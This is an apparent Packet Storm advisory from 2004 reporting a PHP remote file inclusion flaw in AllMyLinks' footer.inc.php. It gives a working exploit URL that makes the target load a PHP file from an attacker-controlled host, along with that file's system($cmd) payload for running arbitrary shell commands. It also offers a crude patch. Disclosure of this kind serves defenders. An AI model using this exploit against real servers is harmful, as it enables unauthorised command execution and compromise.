AllMyLinks.txt

2004-02-14T00:00:00
ID PACKETSTORM:32686
Type packetstorm
Reporter bnfx
Modified 2004-02-14T00:00:00

Description

                                        
                                            `  
  
******** AllMyLinks PHP Code Injection vulnerability ********  
  
Product : AllMyLinks  
Vendor : www.php-resource.net  
Date : February 14, 2004  
Problem : PHP Code Injection  
Vendor Contacted ? : No  
  
************************** Source ****************************  
  
in /include/footer.inc.php  
  
--------------------------------------------------------------  
  
$AML_footer_get = require_once("".$_AMLconfig['cfg_serverpath']."/include/template.inc.php");  
  
--------------------------------------------------------------  
  
************************** Exploit ***************************  
  
http://[target]/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://[attacker]/&cmd=uname%20-a  
  
in http://[attacker]/include/template.inc.php have :  
  
------------------------  
  
<?  
system($cmd);  
?>  
  
------------------------  
  
************************** Impact ****************************  
  
Malicious user execute arbitrary commands on the server .  
  
************************* Solution ***************************  
  
in /include/footer.inc.php replace   
  
$AML_footer_get = require_once("".$_AMLconfig['cfg_serverpath']."/include/template.inc.php");  
  
  
for  
  
  
if (isset($_AMLconfig['cfg_serverpath'])){  
die("Don\'t Hack it :)");  
}  
  
$AML_footer_get = require_once("".$_AMLconfig['cfg_serverpath']."/include/template.inc.php");   
  
************************** Credits ****************************  
  
bnfx : bnfx@antisocial.com  
  
Mad_Skater : m4dsk4t3r@hotmail.com  
  
TechTeam Brazilian Crew .  
`